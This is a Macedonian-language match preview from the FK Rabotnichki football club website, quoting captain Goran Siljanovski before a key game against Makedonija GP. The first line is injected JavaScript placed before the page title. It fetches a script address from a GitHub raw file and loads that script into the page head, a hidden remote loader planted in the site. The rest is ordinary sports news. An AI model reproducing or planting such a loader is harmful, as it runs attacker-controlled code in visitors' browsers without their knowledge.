;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Силјановски: Мечот против Македонија ЃП е како финале…последниот воз за Европа
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Силјановски: Мечот против Македонија ЃП е како финале…последниот воз за Европа

Работнички утре (13 часот) на Националната арена „Тодор Проески“ ја пречекува Македонија ЃП во еден од најважните мечеви во пролетниот дел од сезоната. Победата е приоритет доколку нашиот тим сака да го задржи чекорот во трката за излез во Европа. Македонија ЃП во моментот се наоѓа на третата позиција на табелата која носи излез на меѓународна сцена.

Капитенот Горан Силјановски вели дека фудбалерите се свесни за тежината на натпреварот и ќе сторат се за да дојдат до целта. Секако, максимален респект за противникот, Македонија ЃП, која оваа сезона игра одлично и долго време го чува третото место на табелата.

„Мечот против Македонија ЃП е како финале за нас. Ако сакаме да се надеваме на излез на европска сцена, да се обидеме да се искачиме на третото место на табелата кое носи во Европа, тогаш утрешниот меч е последниот воз. Македонија ЃП има солидна бодовна предност на третата позиција и јасно е дека ни е потребна победа за да се доближиме бодовн. Свесни сме за значењето на натпреварот, верувам дека сите ќе го дадеме максимумот и ќе се обидеме да го надиграме противникот за кој имаме максимален респект“, вели капитенот Горан Силјановски.

Натпреварот меѓу Работнички и Македонија ЃП ќе го суди Игор Стојчевски.